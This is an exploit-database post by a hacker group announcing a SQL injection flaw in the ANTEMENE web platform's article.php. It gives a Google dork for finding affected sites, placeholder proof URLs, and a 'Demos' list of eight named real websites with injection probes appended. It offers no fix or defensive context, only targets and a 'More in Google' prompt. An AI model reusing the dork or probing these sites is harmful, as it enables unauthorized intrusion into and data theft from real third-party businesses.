ANTEMENE suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
c3e7b70af7b0947686b188fd14292ff4d33683e0fceaedbbd8ac149bee6b305e
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm TUNISIAN CYBER member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
[+] Author: TUNISIAN CYBER
[+] Home: 1337day.com Inj3ct0r Exploit DataBase
[+] Exploit Title: ANTEMENE SQL Injection Vulnerability
[+] Date: 10-09-2012
[+] Category: WebApp
[+] Google Dork: intext:"Création internet et référencement web / Agence web " article.php
[+] Tested on: Windows 7 Professionnel / Windows Server 2008
[+] Vendor: http://www.antemene.com
########################################################################################
Proof:
127.0.0.1/article.php?id=[SQLi]
127.0.0.1/article.php?id_categorie=&id_article[SQLi]
Demos:
http://www.destination-piscine.com/m_catalogue/article.php?id=4'
http://www.domaine-usseglio.fr/m_vin/article.php?id_categorie=&id_article=3'
http://www.vins-saint-saturnin.com/m_vin/article.php?id_categorie=3&id_article=39'
http://www.costieres.com/m_vin/article.php?id_categorie=2&id_article=26'
http://www.cave-vauvert.com/m_vin/article.php?id_categorie=2&id_article=6'
http://www.vignerons-castelas.com/m_vin/article.php?id_categorie=&id_article=13'
http://www.bulbargence.com/m_catalogue/article.php?id_categorie=89&id_article=48'
http://www.sasvp.com/m_catalogue/article.php?id_categorie=14&id_article=11'
More in Google =)
########################################################################################
Greets to: TN H4CK3RZ , r00tw0rm members and Inj3ct0r Team
###########################################################################################